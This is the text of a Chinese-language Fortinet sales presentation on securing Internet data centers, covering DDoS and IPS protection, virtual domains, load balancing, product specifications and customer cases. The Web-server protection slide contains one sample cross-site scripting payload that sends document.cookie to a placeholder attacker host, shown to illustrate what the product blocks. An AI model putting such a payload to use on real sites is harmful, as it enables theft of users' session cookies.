Fortinet产品IDC安全解决方案
议程 1 IDC现状分析 2 Fortinet产品IDC威胁防御技术 3 Fortinet介绍 4 成功案例
IDC概述 IDC (Internet Data Center)是数据大集中而形成的集成IT应用环境,它是各种IT应用服务的提供中心,是数据计算、网络、存储的中心。 IDC的复杂性为数据中心的安全体系引入许多不确定因素,一些未实施正确安全策略的数据中心,黑客和蠕虫将顺势而入。 对于日趋成熟和危险的各类攻击手段,传统的防御措施显现的力不从心。
IDC概述 1995-2005 CERT/CC统计发现的漏洞 针对系统缺陷的应用攻击已成为IDC面临的主要威胁
IDC安全分析 IDC Internet 用户的系统发生事故时,不能为解决客户与服务商之间的纠纷提供依据 黑客针对托管设备安全威胁,例如针对Web、Email等网络应用服务的攻击 分布式拒绝服务攻击(DDOS)、蠕虫病毒等大规模的流量型攻击
IDC其它需求 安全设备的性能是否能满足IDC高流量过滤需求? 如何不在增加宽带的情况下,加速用户托管设备的应用? 怎样在最小成本下为用户 实现不同的安全功能?
IDC网络结构 通常由3个层面构成 骨干层通过高性能路由器连接两个或者以上的运营商互联网骨干网,提供Internet接入,并实现链路备份 汇聚层一般由两个核心交换机组成,用于连接骨干层与接入层 接入层由若干L2/L3交换机构成,接入各种托管服务。
议程 1 IDC现状分析 2 Fortinet产品IDC威胁防御技术 3 Fortinet公司介绍 4 成功案例
Fortinet 统一安全解决之道 统一安全防御 灵活策略配置 简化维护成本 集中安全管理 集中安全审计 病毒攻击 数据加密 SSL访问 统一安全防御 灵活策略配置 简化维护成本 集中安全管理 集中安全审计 入侵检测 安全策略 病毒攻击 The cost one FortiClient is significantly lower then what would be required to purchase from various point product security vendors. 邮件过滤 Web安全 应用加速
Fortinet 统一安全解决之道 中文管理 日志审计 集中网管 CLI 安全分析 SNMP 深度攻击保护 会话控制 FortiOS™ ASIC/NPU双芯片技术 中文管理 日志审计 集中网管 CLI 安全分析 SNMP 深度攻击保护 会话控制 FortiOS™ 安全操作系统 FortiASIC™ 独特内容加速 攻击联动 内容过滤 防火墙 VPN加密 Fortinet built a platform designed to take on additional capabilities over time. First Fortinet started with FW, VPN, VDOMs and Traffic Shaping From there we were able to add additional security functions, such as IPS, web filtering, antispyware and antispam And we surround these functions with powerful management capabilities. 虚拟管理 用户认证 流量控制
高效 - 双ASIC芯片加速 FortiASIC-CP (内容处理器) FortiASIC-NP (网络处理器) 特征匹配 系统安全保护 内容过滤 加密解密 VPN协商 密钥维护 FortiASIC-NP (网络处理器) 高速包转发 线速防火墙 IPSec VPN NAT 防DoS攻击 流量整形
部分产品性能测试结果 - 吞吐量 NAT模式,UDP防火墙双向吞吐量(单位:Mbps) 型号 接口 64 512 1518 FGT-310B Port1-Port2 2000.00 FGT-3016B-FB4 Ports amc-sw1/1-amc-sw1/2 FGT-3600A-FB4 Ports FGT-3810A-FB4 Ports FGT-5001A-FB8 amc-dw1/1-amc-dw1/2
部分产品性能测试结果 - 延迟 NAT模式,UDP防火墙双向50%吞吐下的延迟(单位:us) 型号 接口 64 512 1518 FGT-310B Port1-Port2 1.80 2.67 3.13 FGT-3016B-FB4 Ports amc-sw1/1-amc-sw1/2 1.10 1.47 1.50 FGT-3600A-FB4 Ports 1.07 FGT-3810A-FB4 Ports 1.57 FGT-5001A-FB8 amc-dw1/1-amc-dw1/2 1.27 1.83 1.97
主机保护—防火墙安全 Client
主机保护—会话控制 基于源/目的IP及端口对会话进行监控,即时中止异常会话 配置会话保持计时器,减轻服务器处理负担,提高响应时间
主机保护—攻击安全防御 DDOS攻击流量控制 TCP/UDP/ICMP 非正常流量将被屏蔽 基于源地址/目的地址/端口号
网络层攻击防御 可基于目标地址、目标端口、源地址对攻击来源及目标进行防御 防御DDOS攻击类型 Tcp syn flood Tcp端口扫描 Udp flood Udp扫描 udp源会话数据限制 udp目的会话数限制 Icmp flood Icmp sweep icmp源会话数据限制 icmp目的会话数限制 Land攻击 Ping Death
主机保护— IPS深度包过滤 防火墙阻挡非法访问 IPS检查数据包恶意内容 STOP! STOP! 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 STOP! 00000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000 000000000000000000000000000 000000000000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 00 00000000000000000000000000000000 000000000000000000000000000000000 00000000000000000000000000000000 000000000000000000000000000000000
IPS入侵检测和防御 ICSA 认证, NSS认证 高性能 3000多种已知的黑客攻击特征库 (5种严重级别) 基于ASIC的IPS 实时检测 3000多种已知的黑客攻击特征库 (5种严重级别) 专门针对服务器及各种操作系统的安全保护 支持自定义攻击特征库 随时更新攻击特征库 通过FortiProtect分布式网络更新 可定制的Email报警 可以过滤报警信息,以避免来自某个单一攻击产生大量冗余报警信息 设置和维护非常简单 自动阻挡恶意攻击
主机保护—自动隔离攻击者 发现攻击行为时,自动隔离攻击者 可配置的隔离时间 攻击者将在指定时间段过后或被管理员允许后才能再次访问服务器 STOP! Client 发现攻击行为时,自动隔离攻击者 可配置的隔离时间 攻击者将在指定时间段过后或被管理员允许后才能再次访问服务器
主机保护—内容检查 对邮件/WEB网页中访问的不良内容进行过滤 邮件/Web /FTP等允许上传的内容进行审查 STOP! 不良内容 Client 对邮件/WEB网页中访问的不良内容进行过滤 邮件/Web /FTP等允许上传的内容进行审查
X 主机保护—邮件过滤 过滤垃圾/病毒邮件,保护IDC中的邮件服务器 防止不良邮件传播,减轻邮件服务器负担 STOP! 垃圾/病毒邮件 Client 邮件服务器 过滤垃圾/病毒邮件,保护IDC中的邮件服务器 防止不良邮件传播,减轻邮件服务器负担
虚拟技术—为主机提供适当的安全服务 对不同用户指定不同虚拟域 每个虚拟域单独配置,为用户实现不同的安全功能 日志记录将按每虚拟域进行记录 HTTP 虚拟域1 HTTP IPS Firewall 内容过滤 虚拟域2 Mail Internet Mail IPS Firewall 邮件过滤 虚拟域3 Core Router Other IPS Firewall 自动 隔离 OA Root Virtual Domain 日志数据 FortiAnalyzer FortiManager
主机安全——用户认证 IDC用户访问服务器资源时,先进行认证,输入正确的用户名密码才可以继续访问 对不同用户设置不同的访问权限 支持认证方式 STOP! Client IDC用户访问服务器资源时,先进行认证,输入正确的用户名密码才可以继续访问 管理员进行服务器管理 员工访问办公系统 合作伙伴访问相应资源 对不同用户设置不同的访问权限 支持认证方式 本地、Radius、LDAP、SecurID、Windows AD、PKI证书
主机安全—SSL VPN用户认证 STOP! SSL加密 Client IDC用户访问服务器资源时,客户端到网关的数据将被加密传输,然后进行认证,输入正确的用户名密码才可以继续访问 管理员进行服务器管理 员工访问办公系统 合作伙伴访问相应资源 对不同用户设置不同的访问权限 支持认证方式 本地、Radius、LDAP、x.509 数字证书认证、Windows AD
主机安全——Web服务器保护 FortiWeb产品被设计为专用保护Web应用的硬件设备 主要功能 Web应用防火墙 XML防火墙 负载均衡 <SCRIPT> Document.location= ‘http://attackerhost.example/cg-bin/ getcookie.cgi?’+document.cookie </SCRIPT> FortiWeb Client Web服务器 FortiWeb产品被设计为专用保护Web应用的硬件设备 主要功能 Web应用防火墙 XML防火墙 负载均衡 SSL Offloading TCP多路复用
主机安全—— FortiDB数据库安全 FortiWeb产品被设计为专用保护Web应用的硬件设备 主要功能 数据库安全漏洞扫描 Client FortiDB FortiWeb产品被设计为专用保护Web应用的硬件设备 主要功能 数据库安全漏洞扫描 数据库行为审计监控 27
应用加速—服务器负载均衡 访问服务器时,先访问到FortiGate外部接口的虚拟IP地址,由FortiGate将访问转发至真实服务器 VIP Client 访问服务器时,先访问到FortiGate外部接口的虚拟IP地址,由FortiGate将访问转发至真实服务器 一个虚拟IP对应多个真实服务器IP,实现服务器负载均衡 隐藏真实服务器IP,提高安全性 负载均衡支持多种算法 Static Round Robin Weighted First Alive Least RTT Least Session
负载均衡健康检测 X 某台服务器出现问题时,FortiGate将把流量自动转发到状态良好的服务器上 检测服务器状态可用方法 TCP HTTP VIP Client 某台服务器出现问题时,FortiGate将把流量自动转发到状态良好的服务器上 检测服务器状态可用方法 TCP HTTP Ping
应用加速—HTTP多路复用 在FortiGate上维持和客户端的大量连接,而在FortiGate和服务器之间建立少量常开的连接 多个客户连接 健康检查 Server Farm 客户请求复用 (通过单个服务器会话) Client 每个连接中的多个请求 在FortiGate上维持和客户端的大量连接,而在FortiGate和服务器之间建立少量常开的连接 减少服务器的资源消耗,提高服务器的处理性能。 服务器必须支持HTTP/1.1
应用加速—SSL Offloading FortiGate部署在Web服务器前方,处理SSL加/解密 非加密数据 Client Web服务器 FortiGate部署在Web服务器前方,处理SSL加/解密 FortiGate CP6 ASIC芯片提供强大的SSL处理能力 节省Web服务器系统资源,提高访问速度
日志审计与设备管理 网络管理区域 FortiGate 服务器 日志信息 配置管理 FortiAnalyzer 日志审计平台 INTERNET 配置管理 日志信息 FortiGate 服务器 网络管理区域 FortiAnalyzer 日志审计平台 FortiManager 管理平台
FortiAnalyzer集中日志审计平台 安全事件:日志、报表、报警 集中内容存档、文件隔离、漏洞评估 取证分析 (Forensic analysis) 网络流量分析 FortiGate 使用FortiAnalyzer作为存储设备 集中日志服务器 集中报表引擎 内容日志存档 文件隔离和修复 安全事件相关性 (按主机识别相关攻击和病毒) 可以在FortiGate 管理界面 直接查看FortiAnalyzer 上的报表
FortiManager统一管理平台 对以下产品进行集中管理 界面简单方便,可以对上千台设备进行管理 所有FortiGate设备 FortiAnalyzer设备 启动FortiClient的主机 界面简单方便,可以对上千台设备进行管理 与FortiAnalyzer配合提供各类服务: 可以加载各种管理功能的安全管理平台 策略分区和报警提升 配置版本和审计 集成VPN管理器 集中升级
FortiGate产品部署—IDC出口 骨干层Internet出口部署,保护整个IDC 与出口路由器与核心交换机组成全冗余网络结构 通过链路聚合(802.3ad)增加出口带宽
IDC出口安全保护 线速防火墙保护 防DDoS攻击 FortiGate产品专利技术的FortiAsic-NP芯片提供小包线速性能 防火墙安全策略实现访问控制功能 防DDoS攻击 防御拒绝服务攻击及扫描攻击,非正常流量将丢弃 提高带宽利用率
FG5000系列产品实现高性能安全 FortiGate5000系列产品提供多种高性能处理模块 FortiSwitch 5003A负载均衡模块把流量分配到多块FortiGate板卡上 最高可提供10G网络下的安全保护
FortiGate产品部署—中小客户域 为多个中小客户提供保护 通过VLAN Trunk实现虚拟域控制 网管域中的FortiAnalyzer为将按虚拟域为每个客户单独记录日志;FortiManager实现FortiGate设备配置管理、升级管理
IDC中小客户安全保护 线速防火墙保护 IPS攻击防御 内容过滤及邮件过滤 用户可单独管理自己的虚拟域配置,实现各项安全功能 FortiGate产品专利技术的FortiAsic-NP芯片提供小包线速性能 不同虚拟域内配置相应防火墙安全策略,实现不同应用服务器的访问控制功能 IPS攻击防御 根据用户服务器的操作系统、应用服务,在虚拟域配置相应的IPS策略 内容过滤及邮件过滤 对上传文本及邮件内容进行过滤 用户可单独管理自己的虚拟域配置,实现各项安全功能 FortiAnalyzer可根据虚拟域记录日志,并提供图形报表
FortiGate产品部署—大客户区域 为大客户提供高级安全保护 根据用户不同的服务开启相应的安全保护策略 网管域中的FortiAnalyzer为将为大客户记录日志,并定期提供图形报表
IDC大客户安全保护 线速防火墙保护 IPS攻击防御 内容过滤及邮件过滤 FortiGate产品专利技术的FortiAsic-NP芯片提供小包线速性能 对客户不同主机的IP地址或域名配置相应防火墙安全策略,实现不同应用服务器的访问控制功能 IPS攻击防御 根据服务器的操作系统、应用服务,在防火墙策略中配置相应的IPS策略 内容过滤及邮件过滤 对上传文本及邮件内容进行过滤 SSL VPN功能可实现员工OA系统认证加密访问及管理员对服务应用进行安全管理 FortiAnalyzer可为大客户记录日志,定期提供图形报表
议程 1 IDC现状分析 2 Fortinet产品IDC威胁防御技术 3 Fortinet公司介绍 4 成功案例
公司概况 第一个基于ASIC硬件技术的多层安全技术提供商 专业网络安全厂商 权威的安全认证 1000+名员工 / 超过500+工程 技术人员 2000年成立 发展最快的专业安全公司 全球化的销售服务体系( 美国,欧洲,亚洲) 权威的安全认证 7项ICSA认证 最高级政府安全认证 (FIPS-2, Common Criteria EAL4+) 50+ 安全行业认证 美国病毒专业评测试VB 100认证 欧洲专业IPS安全评测NSS认证
FortiAnalyzer - 日志审计系统 产品线列表 FortiGate - UTM安全网关 FortiMail - 邮件安全网关 FortiDB - 数据库安全与审计 FortiClient - PC/手机安全 FortiAnalyzer - 日志审计系统 FortiManager - 集中管理系统 FortiWeb – Web安全防护
FortiGate 50B-800F 产品系列性能 产品型号 防火墙 VPN 防病毒 策略数 并发会话 VPN 通道 FG50B 50M 500 25000 20 FG100A 100M 40M 20M 1000 200,000 80 FG-200A 150M 70M 30M 2,000 400,000 200 FG-110C 500M 65M 4,000 1,500 FG-310B 8G/12 G 6G/9G 160M 8,000 500,000 3,000 FG-620B 20G/24G 12G/15G 250M 600,000 20,000 FortiGate-200A – FortiGate-800F FortiGate-50B – FortiGate-100A
FortiGate 1000A-3800A 产品系列性能 型号 防火墙 会话 VPN 防病毒 策略数 通道 FG-1000A/1000FA2 2 Gbps 600K/15K 400 Mbps 200 Mbps 30,000 5,000 FG-3016B 16/20 Gbps 1M/25k 12/15 Gbps 300 Mbps 100,000 10,000 FG-3600A 6/10 Gbps 1M/40k 800/3800 Mbps FG-3810A 7/26 Gbps 2M/40K 1/13 Gbps 500 Mbps
FortiGate-110C详细产品信息 硬件 基于FortiASIC CP 的UTM 加速 2个10/100/1000 WAN接口 8个10/100内置交换接口 1个控制接口 2个USB接口 1U 高度 桌面式设备 配有 19” 机架安装工具 吞吐量 FG-110C基本模块 500Mbps防火墙吞吐量 100Mbps IPSec VPN吞吐量 65Mbps防病毒吞吐量 200Mbps IPS吞量 软件 FortiOS 多威胁引擎 支持FortiManager 支持FortiAnalyzer 支持FortiGuard分析管理服务
FortiGate-310B FG-310B 基本配置 增加 AMC模块 (见上图) 系统软件 吞吐量 硬件规格 8 Gbps 防火墙吞吐量(小包) 6 Gbps IPSec VPN 吞吐量(小包) 增加 AMC模块 (见上图) 12 Gbps防火墙吞吐量(小包) 9 Gbps IPSec VPN防火墙吞吐量(小包) 14 个 GigE 端口 系统软件 FortiOS Multi-Threat Engine 支持 FortiManager 支持 FortiAnalyzer 支持 FortiGuard A&M 服务. 硬件规格 FortiASIC CP(内容处理器) 用于内容层扫描加速 8个 FortiASIC Network Processor (NP网络处理器)用于网络层转发加速 2 个非加速铜口 1 个单宽的 AMC 插槽 1 GB 系统内存 2 个USB 端口,支持3G modem,支持USB系统文件备份 备份的DC 连接器接口 (为将来使用) 高度1U,机架式。 AMC扩展模块
FortiGate-620B详细产品信息 吞吐量 硬件 FG-620B基本模块 配置FortiASIC内容处理器的UTM加速 16 Gbps防火墙吞吐量 12 Gbps IPSec VPN吞吐量 配置可选AMC模块 20 Gbps防火墙吞吐量 15 Gbps IPSec VPN吞吐量 24 个千兆接口 软件 FortiOS多威胁引擎 支持 FortiManager/FortiAnalyzer 支持 FortiGuard分析管理服务 硬件 配置FortiASIC内容处理器的UTM加速 16个FortiASIC网络处理器(NP) 加速接口 4个非NP加速铜口 1个单宽前面板AMC插槽 2个USB接口 1U高度机架式设备
FortiGate-3016B 高性能的新一代防火墙 With country selection 接口全部提供NP2 ASIC加速 接口 全线速防火墙吞吐量(小包) 线速的VPN(小包) 提高了IPS DoS防御能力 性能参数 16/20 Gbps防火墙吞吐量 (基本配置/配置AMC模块) 12/15 Gbps 3DES VPN (基本配置/配置 AMC模块) 2 Gbps IPS (UDP) 300 Mbps HTTP AV 冗余/热插拔电源模块配置 可以支持到250虚拟域 接口 16个千兆SFP接口 (可支持光口和铜口) 2-铜口千兆管理接口 1-AMC扩展模块 可选的AMC模块 4个SFP端口的单宽AMC卡 (4G性能 64bytes-1518bytes) 1个80G硬盘的单宽AMC卡 With country selection AMC扩展模块
FortiGate 3600A 高性能的AV和IPS网关 强大的新的双核 CPU和CP6 ASIC 提高了 AV 和 SSL VPN 吞吐量 2 个加速的 SFP接口可以实现线速的小包转发 仍旧涵盖UTM的内容处理方面的功能: URL过滤 垃圾邮件过滤 入侵检测与防御 性能指标 6-10Gbps防火墙吞吐量 (标准配置/满配 AMC) 3Gbps IPS 800-3800Mbps 3DES VPN (标准配置/满配 AMC) IPSec隧道数:64000 400 Mbps HTTP AV 冗余和热插拔电源 双CLI串口和双USB接口 接口 8-10/100/1000 ports 2-Accelerated Gigabit SFP ports 1-AMC expansion slot 可选的AMC Additional 4 SFP ports or Hard Disk Drive 对于需要高性能的AV和IPS功能的数据中心来说是非常理想的 最多可以支持250个虚拟域 With country selection
FortiGate 3810A 可扩展的10-Gig AMC平台 强大的新双核CPU和CP6 ASIC芯片 提高了 AV和SSL VPN吞吐量 2个加速SFP接口实现线速的小包吞吐 支持 4 AMC可扩展插槽 2 个双宽的插槽 2 个单宽的插槽 支持四格10-Gig ASIC的接口 性能参数 7-37Gbps防火墙吞吐量 (标准配置/满配 AMC) 4 Gbps IPS (UDP) 1-19Gbps 3DES VPN (标准配置/满配 AMC) IPSec隧道数:64000 500 Mbps HTTP AV 冗余和热插拔的电源 双 CLI串口和双USB接口 标准配置的接口数量 8-10/100/1000接口 2-Gigabit SFP 加速接口 4-AMC可扩展插槽 可选的AMC 10-Gig 双宽的2 个SFP接口板卡 单宽的4 个SFP接口板卡 硬盘(单宽) 最多Support for up to 250 VDOMs With country selection
FortiGate 3810A 四个AMC扩展插槽 DW = 双宽插槽 SW = 单宽插槽 AMC 命名传统: SW DW SW DW 双宽插槽仅支持双宽模块. 单宽插槽仅支持单宽模块 AMC模块可以从名称上区分出是双宽或者单宽. ASM-xxx 是单宽, e.g. ASM-FB4 ADM-xxx 是双宽, e.g. ADM-XB2 With country selection AMC 命名传统: ASM-FB4 = AMC Single-width Module – Fiber based, NPB Accelerated, 4 ports ADM-XB2 = AMC Dual-width Module – XFP based, NPB Accelerated, 2 ports ASM-S08 = AMC Single-width Module – Storage device with 80 GB capacity
AMC扩展卡 ASM-FB4 ASM-S08 ADM-FB8 ADM-XB2 4 * 1000M SFP(全线速) 防火墙吞吐量:4Gbps VPN吞吐量:3Gbps 单倍宽度 ASM-S08 80G硬盘 ADM-FB8 8 * 1000M SFP(全线速) 防火墙吞吐量:8Gbps VPN吞吐量:6Gbps 双倍宽度 ADM-XB2 2 * 10G接口 防火墙吞吐量:11Gbps
AMC故障旁路模块 ASM-CX4和ASM-FX2特征 出现故障自动旁路 模块化设备 与FortiGate用户接口紧密结合 故障旁路状态 断电 系统故障 模块化设备 单宽度AMC模块 与FortiGate用户接口紧密结合 监控 / 配置 / 改变旁路参数 产生旁路相关事件告警日志 故障旁路状态 模块状态虚拟指示灯 在电源有效并进行旁路运行模式时,旁路状态指示灯亮起 FortiGate 界面内的状态图标
FortiGate 5000系列 FortiGate 5020 FortiGate 5050 FortiGate 5140
FortiGate 5140 高密度部署的14 槽机箱部署 12 个支持ATCA架构的节点插槽 2个 支持ATCA架构 的节点/HUB插槽 2 专用 Shelf Manager 槽 Shelf Alarm 面板 配合 5003 交换模块实现全机箱和系统的冗余。 5000的所有刀片都可以使用在HA或 Standalone 模式下, Nat/路由 和透明模式都支持。 HA冗余配置最大支持12个5000系列的刀片和两个5003交换模块,系统无单点故障 -48V 直流电源供电 Two (redundant) power entry modules (PEM) supplying 4 power zones 三个风扇托盘槽 背面有两个热交换冗余-48V/-60V直流供电模块(PEM),标记为A和B,Fortinet出厂的5140机箱标配安装有A和B两个供电模块。两个供电模块为5140机箱、板卡和风扇提供冗余的电源。如果你需要冗余电源,那么直流电要接到A,B两个供电模块上,如果不需要冗余电源,那么直流电要连到供电模块A上,每个供电模块的-48V有4个接线端子,地线也是4个端子,使用时所有的8个端子都应该连接到电源上,供电模块是支持热插拔的,在开机的情况下,可以取下或更换供电模块而不需要停机。 背面还有电源连接线托盘用于电源线,地线,机箱地线的走线,机箱地接线端子,机箱地线必须连接到数据中心地线。 *Performance Figures assumes external load balancers 57
FortiGate 5050 5 槽机箱 2 个专用的 Shelf Manager插槽 配合 5003 交换模块实现全机箱和系统的冗余。 3 个支持ATCA 架构的节点插槽 2个支持 ATCA架构的 节点/Hub插槽 2 个专用的 Shelf Manager插槽 配合 5003 交换模块实现全机箱和系统的冗余。 5000的所有刀片都可以使用在HA或 Standalone 模式下, Nat/路由 和透明模式都支持。 HA冗余配置最大支持12个5000系列的刀片和两个5003交换模块,系统无单点故障 -48V 直流电源供电 58
FortiGate 5020 3 个支持ATCA 架构的节点插槽机箱 内部背板总线端口支持HA互连。 5000的所有刀片都可以使用在HA或 Standalone 模式下, Nat/路由 和透明模式都支持。 不支持 5003 交换模块 59
FortiGate 5000-系列安全刀片 最高的全内容保护性能 核心防火墙 增强的多层内容安全 基本的多层内容安全 支持万兆接口 FortiGate-5001A 最高的全内容保护性能 支持万兆接口 支持AMC扩展 为高性能的核心网络优化的 FortiGate-5005FA2 核心防火墙 FortiASIC 加速— 专为核心网络设计 和 FortiController-5208 配合使用提供负载均衡功能 为高性能的核心网络优化的 FortiGate-5001FA2 增强的多层内容安全 FortiASIC 性能加速以保证VOIP或Video服务完整、实施透明 为多媒体应用优化的 FortiGate-5001SX 基本的多层内容安全 完全集成的防火墙、IPSec VPN、SSL-VPN、IPS、防病毒、Web 过滤和反垃圾邮件功能。 为全内容扫描优化的 * Includes spyware and malware protection 60
FortiGuard全球安全响应中心 100+ 安全响应工程师提供24X7安全特征库更新 Anti-Virus (AV) (Includes Anti-Spyware) Intrusion Prevention System (IPS) 美国 加拿大 英国 法国 中国 马来西亚 新加坡 日本 32 servers in 14 strategic locations SLA 3小时攻击库特征更新 24X7全球安全实验室 中国天津病毒安全中心
全球的技术支持中心(GTAC) 加拿大 亚洲中心 (Vancouver) (北京,马来西亚) 客户支持数据库 欧洲中心 (法国) 美国中心 (Sunnyvale) Japan TSC (Tokyo) - 台湾 RMA中心 技术支持中心(TSC) – Level I & II 技术支持中心 (TSC) – Level III 客户注册和支持的数据库 技术支持中心 (TSC) – Level I & II RMA的后勤中心
议程 1 IDC现状分析 2 Fortinet产品IDC威胁防御技术 3 Fortinet产品介绍 4 成功案例
无锡电信IDC 服务器区出口部署透明模式FortiGate设备,不改变原有拓扑 对用户开启各自的虚拟域,用户可自行配置需要的安全策略 FortiGate1000AFA2针对小包处理而特别设计的端口,能够全线速转发各类数据包 FortiAnalyzer设备根据虚拟域为用户记录日志,并定期提供图形报表
浙江电信 各分公司与总公司之间通过IPSec VPN隧道进行连接,FortiGate设备对IPSec VPN隧道内的病毒、蠕虫等有害信息进行过滤。 总公司Interenet出口部署一台FortiGate5020设备,两块板卡配置为HA结构。 在省中心建立安全运营中心,收集日志信息,集中管理FortiGate设备。
更多信息请访问 http://www.fortinet.com 谢谢! 更多信息请访问 http://www.fortinet.com 66